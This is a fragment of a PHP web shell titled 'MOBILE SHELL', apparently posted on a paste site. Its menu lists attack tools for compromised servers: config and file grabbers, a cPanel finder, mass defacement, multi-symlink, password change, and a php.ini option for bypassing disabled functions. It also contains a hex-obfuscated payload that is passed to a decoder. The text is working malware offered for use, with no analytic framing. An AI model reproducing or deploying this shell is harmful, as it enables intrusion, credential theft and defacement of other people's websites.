- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Jumping Server</td><td class="td-tools-icon"><a href="?'.x7.'jumping&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Config Grabber</td><td class="td-tools-icon"><a href="?'.x7.'config&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">File Grabber</td><td class="td-tools-icon"><a href="?'.x7.'filegrab&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Cpanel Finder</td><td class="td-tools-icon"><a href="?'.x7.'cpanel&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Mass Deface</td><td class="td-tools-icon"><a href="?'.x7.'massdef&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">MD5 Creator</td><td class="td-tools-icon"><a href="?'.x7.'md5&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multi Symlink</td><td class="td-tools-icon"><a href="?'.x7.'symlink&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Change Password</td><td class="td-tools-icon"><a href="?'.x7.'change&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Me : [ <font color="#1D9D73">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]</td><td class="td-tools-icon"><a href="?'.x7.'kill&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-trash"></i></button></a></td></table>');
- echo('</div>');
- echo(x("\x4e\x30\x68\x67\x63\x31\x62\x77\x4d\x79\x32\x4b\x4d\x7a\x33\x69\x63\x63\x4f\x77\x39\x39\x5a\x62\x52\x54\x76\x4c\x54\x6f\x38\x72\x30\x58\x54\x6a\x7a\x75\x6d\x56\x50\x5a\x55\x74\x70\x46\x6c\x6d\x47\x75\x58\x59\x2f\x51\x50\x7a\x57\x77\x37\x4f\x66\x2f\x32\x61\x4a\x32\x42\x6a\x31\x47\x64\x70\x78\x38\x4c\x4e\x4e\x48\x64\x68\x48\x50\x44\x6d\x67\x50\x6f\x41\x65\x50\x39\x6e\x37\x67\x30\x44\x64\x79\x78\x5a\x39\x62\x31\x36\x73\x63\x52\x63\x65\x4b\x2f\x41\x44\x74\x35\x36\x4c\x61\x46\x70\x69\x63\x38\x36\x44\x33\x41\x4b\x37\x42\x4b\x68\x4b\x4b\x4e\x32\x49\x37\x33\x39\x59\x75\x55\x69\x5a\x63\x49\x76\x66\x51\x41\x58\x4f\x77\x76\x37\x2f\x67\x58\x6a\x72\x4b\x2b\x2b\x75\x59\x6b\x6a\x7a\x46\x4c\x5a\x41\x67\x31\x44\x79\x6b\x61\x54\x43\x51\x4d\x41\x43\x38\x68\x30\x61\x30\x44\x39\x50\x34\x4f\x6d\x56\x76\x49\x39\x54\x48\x68\x31\x37\x55\x62\x4c\x66\x61\x75\x44\x6b\x49\x66\x6e\x6f\x37\x49\x5a\x39\x57\x57\x78\x62\x42\x74\x6c\x6a\x38\x4b\x5a\x6e\x6d\x4b\x62\x38\x45\x6c\x6d\x4f\x66\x75\x66\x68\x54\x2f\x62\x6e\x32\x49\x6f\x6a\x61\x44\x63\x72\x34\x66\x7a\x70\x48\x6d\x57\x71\x48\x72\x74\x34\x35\x4c\x58\x43\x33\x49\x50\x49\x72\x59\x4b\x7a\x64\x38\x49\x31\x34\x6d\x62\x4d\x74\x43\x37\x56\x5a\x52\x4b\x5a\x77\x4f\x31\x5a\x5a\x46\x50\x43\x6f\x79\x75\x56\x5a\x76\x38\x6a\x47\x48\x45\x56\x45\x56\x4e\x62\x36\x30\x30\x39\x6c\x50\x6e\x4f\x4d\x52\x58\x66\x44\x2f\x79\x70\x66\x7a\x5a\x52\x37\x4e\x6c\x2b\x33\x6f\x65\x50\x66\x6d\x62\x50\x73\x73\x37\x2b\x73\x62\x6c\x2f\x77\x42\x58\x2b\x32\x70\x6c\x71\x74\x6c\x7a\x49\x50\x43\x78\x57\x49\x55\x56\x6b\x78\x69\x2b\x4e\x2f\x79\x70\x4f\x69\x45\x69\x38\x66\x4d\x42\x6d\x78\x53\x66\x43\x61\x72\x47\x73\x6e\x42\x59\x50\x44\x34\x6b\x4d\x4b\x7a\x4d\x32\x31\x42\x47\x6d\x51\x61\x7a\x6b\x54\x49\x78\x54\x7a\x38\x66\x6e\x75\x4d\x4a\x75\x70\x4f\x45\x5a\x71\x33\x47\x78\x6b\x61\x55"));
- echo('<div class="tools-content top" style="padding:5px">');
- echo('<table>
- <form action="?'.x5.$dir.'" method="POST"><td align="center" style="width:10%"><i class="fa fa-bookmark-o"></span></td>
- <td style="width:70%"><select name="ms_cr" id="c">');
- echo('<option value=""> —— Choose File ——</option>');
- echo('<option value="1">Create File [ index.php ]</option>');
- echo('<option value="2">Create File [ x.php ]</option>');
- echo('<option value="3">Adminer [ adminer.php ]</option>');
- echo('<option value="4">Security [ .htaccess ]</option>');
- echo('<option value="5">Bypass Disable [ php.ini ]</option>');
- echo('</select></td>
- <td style="width:20%;text-align:right"><button type="submit" class="btn-exe" onclick="create();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>
- </div></div></div>
- </div></div></div><div class="co-ontainer"><div class="footer">CODED BY WILDAN IZZUDIN</div></div>');
- echo('<script>
- function ex(t) {
- var yx = window.navigator.vibrate(t);
- $.dialog ({
- icon: "fa fa-drupal",
- title: "MOBILE SHELL",
- content: "I am convinced that, because the criminal justice system is run by humans, it is naturally subject to human error. There is no rational basis to believe that this same type of <font color=\'#1D9D73\'>Human Error</font> will not infect capital murder trials.",
- animation: "Rotate",
- theme: "Dark",
- });
- }
- </script>');
- ?>
Add Comment
Please, Sign In to add comment